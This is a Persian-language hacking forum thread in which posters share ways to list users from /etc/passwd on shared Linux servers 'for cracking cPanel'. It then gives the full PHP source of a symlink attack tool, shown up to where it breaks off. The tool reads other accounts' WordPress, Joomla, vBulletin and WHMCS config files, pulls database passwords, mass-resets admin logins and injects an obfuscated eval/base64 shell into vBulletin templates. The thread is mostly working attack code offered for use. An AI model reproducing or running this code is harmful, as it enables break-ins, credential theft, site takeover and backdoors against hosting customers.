اطلاعیه

**b0x** · 05-15-2013, 06:54 AM

RE: Passwd Bypasser

نوشته اصلی توسط Mr.XpR

در بعضی از سروری لینوکس وقتی دستور cat etc/passwd وارد میشه یوزر ها نمایش داده نمیشوند با این اسکریپت میتونید فایل passwd را بای پس کنید .

[align=center]

[/align]

بصورت یک فایل php ایجاد و آپلود نمایید .

[align=left]

کد:

<?php
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
?>

[/align]

سلام

ممنون اسکریپت خوبی هست ولی بعضی مواقع توابع رو محدود میکن و ممکنه اصلا ران نشه

میشه با دستورات زبان برنامه نویسی کوچک AWK خیلی راحت باپس کرد .

awk -F: '{ print $1 }' /etc*/passwd | sort
------------------------------------------

awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc*/passwd | sort
------------------------------------------------------------------------------------------------

awk -F":" '{ print "user****: " $1 "\t\tuid:" $3 }' /etc/passwd

در ضمن ممکنه تو فایل /etc/passwd ما همه ستونها رو نیاز نداشته باشیم و فقط و فقط یوزرها رو مثلا

برای کرک cpanel بخواهیم

با دستور cut میشه اینکار رو کرد

cat /etc/passwd | cut -d ":" -f1

**nazila** · 05-28-2013, 04:36 AM

RE: Passwd Bypasser

خوب اون شل رو هم میزاشتی دیگه !

زبان php خیلی تشابح به ++c داره جالبــــــه !

اگر یه سروری همچین یوزری رو داشت پیدا هم شد ولی سطح دسترسی نداشتیم واسه سیمیلینک چیکار کنیم !

فایل passwd دسترسی داریم ولی named.conf اینطور نیست .

راستی میشه توضیح بدید چرا از وؤزن های کرنل 2011 به بعد همه named.conf ها خوانده نمیشه؟

اسمشو تغییر دادن یا سطح دسترسی !

مرسی

**0R2x** · 05-28-2013, 09:16 AM

RE: Passwd Bypasser

دانلود شل

====

اگر یه سروری همچین یوزری رو داشت پیدا هم شد ولی سطح دسترسی نداشتیم واسه سیمیلینک چیکار کنیم ?
bypassچجوری ؟ سرچ در فروم آمورش دوستان گذاشتن

اما خواندن named.confبرای این نمیشه خوند که کانفیگر های که سرور رو کانفیگ کردن با تجربه تر شدن و از طرفی developerهای OS خوب سیع در امن کردن دارن مسلما در ورژن های جدید پرمیژن ها هم دقیق تر داده خواهد شد

اما همچنان همیشه راهی برای دور زدن امنیت وجود دارد حتی همین named.conf

موفق باشید و سربلند

**Mr.XpR** · 05-28-2013, 10:12 AM

RE: Passwd Bypasser

named.conf فایلی هست که محل ذخیره شدن یه سری اطلاعات از دامنه ها ، یوزر ها و ... هست و نبودنش هم زیاد فرقی نداره

مهم سطح دسترسی شما به یوزر و فایل passwd ، شما باید اول سطوح امنیتی رو چک کنی حالا سیمیلینک یا چک کردن پورت های باز ، Ftp ، Mysql ، دوران symlink دیگه سر اومده باید با ایده های جدید ترین روش ها رو پیش برد البته نسخه های فعلی لینوکس bypass میشه که باید در موردش یکم سرچ کنی . http://iranhack.com/acc/forum-44.html

واسه سیمیلینک از طریق فایل passwd بصورت اتوماتیک میتونی از اسکریپت زیر استفاده کنی . کارش بد نیست .

کد:

<?php
 
 
/*
 
  .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
  88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88'YbdP`88
  `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
    `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
  db   8D 88.     Y8b  d8         `8b d8'8b d8' db  Y8b  d8 `8b  d8' 88  88  88
  `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP
 
 
   author..............: s3n4t00r
   home................: sec-w.com
   twitter.............: @s3n4t00r
   name tools..........: Symlink Sa v3.0
 
*/
 
 
 
set_time_limit(0);
error_reporting(0);
 
 
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );
 
$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
 
?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 
<html xmlns="http://www.w3.org/1999/xhtml">
 
<head>
<title>Symlink_Sa 3.0</title>
 
<style type="text/css">
 
  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}
a{
 
 font-size: 13px;
 
}
 
 
body {
    direction: ltr;
    background-color:#F4F4F4;
    color: rgb(153, 153, 153);
    text-align: center
}
 
 
 
input,textarea,select{
font-weight: bold;
color: #000000;
}
 
input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}
 
 
.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;
 
 
}
 
.cont a{
 
 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}
 
.cont a:hover{
 
 
  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;
 
 
}
 
.tmp tr td{
 
border: solid 1px #BBBBBB;
 
padding: 2px ;
  font-size: 13px;
}
 
.tmp tr td a {
  text-decoration: none;
 
 
 
}
 
.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}
 
.tmp tr td:hover{
 
box-shadow: 0px 0px 4px #888888;
 
}
.fot{
 
font-family:Tahoma, Arial, sans-serif;
 
  font-size: 11pt;
}
.for a : hover{
 
text-shadow: 0px 0px 1px #3366FF;
 
}
 
 
.ir {
  color: #FF0000;
}
 
 
 
</style>
 
</head>
 
<body>
 
<div class='all'>
 
 
<?php
 
@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);
 
 
 
@symlink("/","sym/root");
 
$pg = basename(__FILE__);
 
echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
 
echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
 
echo '<div class="cont">
 
[<a href="?"> Home </a>]
 
[<a href="?sws=sym"> User & Domains & Symlink </a>]
 
[<a href="?sws=sec"> Domains & Script </a>]
 
[ <a href="?sws=file"> Symlink File </a>]
 
[<a href="?sws=passwd"> Symlink Bypass </a>]
 
<br /><br />
 
[ <a href="?sws=read"> Bypass Read </a>]
 
[ <a href="?sws=joomla"> Mass Joomla </a>]
 
[ <a href="?sws=wp"> Mass WordPress </a>]
 
[ <a href="?sws=vb"> Mass vBulletin </a>]
 
[ <a href="?sws=help"> Help </a>]
 
<br /><br /><br />
 
 
 
 
 
 
</div>';
 
if(isset($_REQUEST['sws']))
{
 
switch ($_REQUEST['sws'])
{
 
 
 
 
 
/// Domains + Scripts  ///
 
case 'sec':
 
if(!@is_file('named.txt')){
 
$d00m = @file("/etc/named.conf");
 
}else{
 
$d00m = @file("named.txt");
 
 
}
if(!$d00m)
{
 
                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
 
{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){
 
flush();
flush();
 
 
 
if(eregi("zone",$dom)){
 
@preg_match_all('#zone "(.*)"#', $dom, $domsws);
 
flush();
 
if(@strlen(trim($domsws[1][0])) > 2){
 
$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 
///////////////////////////////////////////////////////////////////////////////////
 
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];
 
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];
 
///////////////////////////////
 
$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];
 
 
$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];
 
////////////////////////////////
 
$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];
 
$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];
 
$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];
 
/////////////////
 
$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];
 
$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];
 
$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];
 
$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];
 
$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];
 
 
 
////////////////////////////////////////////////////////////////////////////////
 
 ////////// Wordpress ////////////
 
$pos = strpos($wp, "200");
$config="&nbsp;";
 
if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}
 
///////////WHMCS////////
 
elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
 
}
elseif (strpos($wh12, "200")  == true)
{
  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}
 
elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
 
}
 
///////// Joomla to 4 ///////////
 
elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}
 
elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}
 
//////////vBulletin to 4 ///////////
 
elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}
 
elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}
 
elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}
 
else
{
 continue;
}
flush();
flush();
 
/////////////////////////////////////////////////////////////////////////////////////
 
 
 
$site = $user['name'] ;
 
 
 
flush();
 
echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();
 
}
}
}
}
 
 
 
 
break;
 
 
/// user + domine + symlink  ///
 
case 'sym':
 
if(!is_file('named.txt')){
 
$d00m = @file("/etc/named.conf");
 
}else{
 
$d00m = @file("named.txt");
 
 
}
if(!$d00m)
{
 
                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
 
{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){
 
if(eregi("zone",$dom)){
 
preg_match_all('#zone "(.*)"#', $dom, $domsws);
 
flush();
 
if(strlen(trim($domsws[1][0])) > 2){
 
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 
flush();
 
 
 
$site = $user['name'] ;
 
 
@symlink("/","sym/root");
 
$site = $domsws[1][0];
 
$ir = 'ir';
 
$il = 'il';
 
if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}
 
 
echo "
<tr>
 
<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>
 
 
<td>
".$user['name']."
</td>
 
 
 
 
 
 
<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>
 
 
</tr></div> ";
 
 
flush();
flush();
 
}
}
}
}
 
 
 
 
break;
 
 
/// file  symlink ///
 
case 'file':
 
echo'
The file path to symlink
 
<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />
 
 
 
</form>
';
 
$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];
 
if ($symlink)
{
 
 
@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);
 
@symlink("$pfile","sym1/$symfile");
 
echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
 
}
 
 
 
break;
 
/// bypass read
 
case 'read':
 
echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();
 
 
$file = '/etc/named.conf';
 
 
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @show_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @symlink($file,'sym.txt');
 
 
if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
 
}
}
 
 
 
echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
 
 
if(isset($_GET['save'])){
 
 
$cont = stripcslashes($_POST['file']);
 
$f = fopen('named.txt','w');
 
$w = fwrite($f,$cont);
 
                  if($w){
 
                  echo '<br />save has been successfully';
 
                  }
 
fclose($f);
 
 
 
 
}
 
 
 
break;
 
// passwd
 
case 'passwd':
 
if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
 
 
$cont = stripcslashes($_POST['file']);
 
if(!file_exists('passwd.txt')){
 
$f = @fopen('passwd.txt','w');
 
$w = @fwrite($f,$cont);
 
fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //
 
echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();
 
$fil3 = file('passwd.txt');
 
foreach ($fil3 as $f){
 
     $u=explode(':', $f);
     $user = $u['0'];
 
 
 
echo "
<tr>
 
 
 
<td width='15%'>
$user
</td>
 
 
 
 
 
 
<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>
 
<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>
 
 
 
</tr></div> ";
 
 
flush();
flush();
 
 
}
 
 
 
 
 
 
die ("</tr></div>");
 
 
                  }
 
 
 
 
 
}
 
 
 
echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
 
$file = '/etc/passwd';
 
 
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @show_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{
 
                                            for($uid=0;$uid<1000;$uid++){
                                             $ara = posix_getpwuid($uid);
                                               if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                 }
 
                                        }
 
 }
 
 
flush();
 
 
echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();
 
break;
 
 
 
case 'joomla':
 
/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
 
 
if(isset($_POST['s'])){
 
$file = @file_get_contents('joomla.txt');
 
$ex   = explode("\n",$file);
 
echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
 
 
foreach ($ex as $exp){
 
$es   = explode("||",$exp);
 
$config = $es[0];
 
$domin = $es[1];
 
$domins = trim($domin).'';
 
$readconfig  = @file_get_contents(trim($config));
 
if(ereg('JConfig',$readconfig)){
 
 
 
$pass    =  ex($readconfig,'$password = \'',"';");
 
$userdb  =  ex($readconfig,'$user = \'',"';");
 
$db      =  ex($readconfig,'$db = \'',"';");
 
$fix     =  ex($readconfig,'$dbprefix = \'',"';");
 
$tab     =  $fix.'users';
 
 
$con     = @mysql_connect('localhost',$userdb,$pass);
 
$db      = @mysql_select_db($db,$con);
 
$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");
 
 
$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
 
 
if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
 
$domins = trim($domin).'';
 
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
 
 
 
}else{
 
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();
 
}
 
}
 
 
 
 
 
 
 
 
 
die();
 
}
 
if(!is_file('named.txt')){
 
$d00m = @file("/etc/named.conf");
 
flush();
 
 
}else{
 
$d00m = file("named.txt");
 
 
}
if(!$d00m)
{
 
                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
 
{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
 
$f = fopen('joomla.txt','w');
 
foreach($d00m as $dom){
 
if(eregi("zone",$dom)){
 
preg_match_all('#zone "(.*)"#', $dom, $domsws);
 
if(strlen(trim($domsws[1][0])) > 2){
 
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 
///////////////////////////////////////////////////////////////////////////////////
 
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];
 
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];
 
$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];
 
 
 ////////// joomla ////////////
 
$pos = strpos($wp, "200");
$config="&nbsp;";
 
if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;
 
}
flush();
 
/////////////////////////////////////////////////////////////////////////////////////
 
$dom = $domsws[1][0];
 
$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
 
 
echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
 
 
 
 
 
flush();
 
 
}
}
}
}
 
 
break;
 
case 'wp':
 
############################ index #########################3
 
 
 
 
 
 
########  admin ##########33
 
if(isset($_POST['s'])){
 
$file = @file_get_contents('wp.txt');
 
$ex   = explode("\n",$file);
 
echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();
 
 
foreach ($ex as $exp){
 
$es   = explode("||",$exp);
 
$config = $es[0];
 
$domin = $es[1];
 
$domins = trim($domin).'';
 
$readconfig  = @file_get_contents(trim($config));
 
if(ereg('wp-settings.php',$readconfig)){
 
 
 
$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
 
$userdb  =  ex($readconfig,"define('DB_USER', '","');");
 
$db      =  ex($readconfig,"define('DB_NAME', '","');");
 
$fix     =  ex($readconfig,'$table_prefix  = \'',"';");
 
$tab     = $fix.'users';
 
$con     = @mysql_connect('localhost',$userdb,$pass);
 
$db      = @mysql_select_db($db,$con);
 
$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
 
$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
 
 
 
if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
 
else
 
{
 
$r = '<b style="color:red">failed</b>';
 
}
 
$domins = trim($domin).'';
 
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
 
flush();
flush();
 
 
 
 
 
 
}else{
 
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
 
flush();
flush();
 
}
 
}
 
 
 
 
 
 
 
 
 
 
die();
 
}
 
if(!is_file('named.txt')){
 
$d00m = @file("/etc/named.conf");
 
}else{
 
$d00m = @file("named.txt");
 
 
}
if(!$d00m)
{
 
                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
 
{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
 
flush();
flush();
 
$f = fopen('wp.txt','w');
 
foreach($d00m as $dom){
 
if(eregi("zone",$dom)){
 
preg_match_all('#zone "(.*)"#', $dom, $domsws);
 
if(strlen(trim($domsws[1][0])) > 2){
 
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 
///////////////////////////////////////////////////////////////////////////////////
 
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];
 
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];
 
$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];
 
 
 ////////// wp ////////////
 
$pos = strpos($wp, "200");
$config="&nbsp;";
 
if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;
 
}
flush();
 
/////////////////////////////////////////////////////////////////////////////////////
 
$dom = $domsws[1][0];
 
$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
 
 
echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();
 
 
 
 
 
flush();
 
 
}
}
}
}
 
 
break;
 
 
case 'vb':
 
 
if(isset($_POST['s'])){
 
 
 
$file = @file_get_contents('vb.txt');
 
$ex   = explode("\n",$file);
 
echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
 
 
foreach ($ex as $exp){
 
$es   = explode("||",$exp);
 
$config = $es[0];
 
$domin = $es[1];
 
$domins = trim($domin).'';
 
$readconfig  = @file_get_contents(trim($config));
 
if(ereg('vBulletin',$readconfig)){
 
 
 
$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
 
$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
 
$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
 
$con     = @mysql_connect('localhost',$userdb,$pass);
 
$db      = @mysql_select_db($db,$con);
 
$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
 
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
 
$crypt .= "$shell";
 
$crypt .= "\')))}}{\${exit()}}</textarea>";
 
$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
 
$query  = @mysql_query($sqlfaq,$con);
 
 
 
if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
 
else
 
{
 
$r = '<b style="color:red">failed</b>';
 
}
 
$domins = trim($domin).'';
 
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
 
 
 
 
 
 
 
}else{
 
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}
 
}
 
 
 
 
 
 
 
 
 
 
die();
 
}
 
if(!is_file('named.txt')){
 
$d00m = file("/etc/named.conf");
 
}else{
 
$d00m = file("named.txt");
 
 
}
if(!$d00m)
{
 
                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
 
{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
 
$f = fopen('vb.txt','w');
 
foreach($d00m as $dom){
 
if(eregi("zone",$dom)){
 
preg_match_all('#zone "(.*)"#', $dom, $domsws);
 
if(strlen(trim($domsws[1][0])) > 2){
 
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
 
///////////////////////////////////////////////////////////////////////////////////
 
$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];
 
$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];
 
$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];
 
 
 ////////// vb ////////////
 
$pos = strpos($wp, "200");
$config="&nbsp;";
 
if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;
 
}
flush();
 
/////////////////////////////////////////////////////////////////////////////////////
 
$dom = $domsws[1][0];
 
$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
 
 
echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
 
 
 
 
 
flush();
 
 
}
}
}
}
 
 
 
 
 
 
 
 
break;
 
case 'help':
 
echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";
 
 
$safe_mode = ini_get('safe_mode');
     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
 
echo "<tr><td>Safe Mode</td><td>$r</td>";
 
$fun = function_exists('symlink');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
 
echo "<tr><td>function symlink</td><td>$r</td>";
 
 
$fun = function_exists('file');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
 
echo "<tr><td>function file</td><td>$r</td>";
 
$fun = function_exists('file_get_contents');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
 
echo "<tr><td>function file_get_contents</td><td>$r</td>";
 
$fun = function_exists('mkdir');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
 
